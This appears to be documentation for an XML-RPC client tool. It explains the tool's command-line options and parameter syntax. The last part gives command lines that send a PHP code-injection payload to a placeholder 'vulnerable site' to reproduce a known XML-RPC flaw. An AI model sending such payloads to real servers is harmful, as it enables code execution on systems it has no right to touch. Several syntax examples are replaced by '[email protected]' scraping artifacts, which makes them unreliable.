This tool allows you to communicate with an XML-RPC service and built packages as custom as you want.
Tool have several options:
- -t: Target. This parameters indicate URL where service is running: http://www.vulnerablesite.com/xmlrpc.php
- -M: Method. Remote method or function that you want to call. In the example of the sum of numbers it can be: SumBigNumbers.
- -P: Parameters. Explained below.
- -h: show help dialog.
- -v: Set verbose mode on. With this option activated, the program will show package before sending.
- -u: User name for web server.
- -p: Password.
There are several types of parameters, according to specification. It can be found at http://en.wikipedia.org/wiki/XML-RPC.
According to type parameters are expressed in one form or another:
All but, array and struct types:
-P integer @[email protected]
Array type may have several values inside. These values are in pairs or tuples. Each pair is separated by ‘#’ symbol. Each tuple are splitted by ‘%’ symbol. Example:
-P [email protected]#value1%type1#value2%...%typeN#valueN
Similar to array, but with 3 params for tuple. Each tuple must be member name, value and type of value. Syntax is equal to array but the tuple has a length of 3. Example:
-P [email protected]#type1#value1%...%nameN#typeN#valueN
If our type is no above, we can make our own type. Syntax is: [email protected]#OurVal2%…%OurValN#OurValN. Example:
-P [email protected]#99999999999%NegativeInt#-10000
This command will produce following code:
<BigInt> 99999999999 </BigInt> <NegativeInt> -10000 </NegativeInt>
If we look a bit on the internet we can find a vulnerability associated with XML-RPC: http://www.securityfocus.com/bid/14088/exploit.
If we want reproduce these code we can write the following command:
RPCClient.exe -t http://www.sitiovulnerable.com/xmlrpc.php -v -M test.method -P "[email protected]#’,”)); phpinfo(); exit;/*”
Mono RPCClient.exe -t http://www.sitiovulnerable.com/xmlrpc.php -v -M test.method -P [email protected]#’,”)); phpinfo(); exit;/*”
It is very important to stress the importance of the quotes that are at the beginning and end of the parameters, because without them shell interpret the command line of what is hidden and not happen in full as a parameter to rpc-client.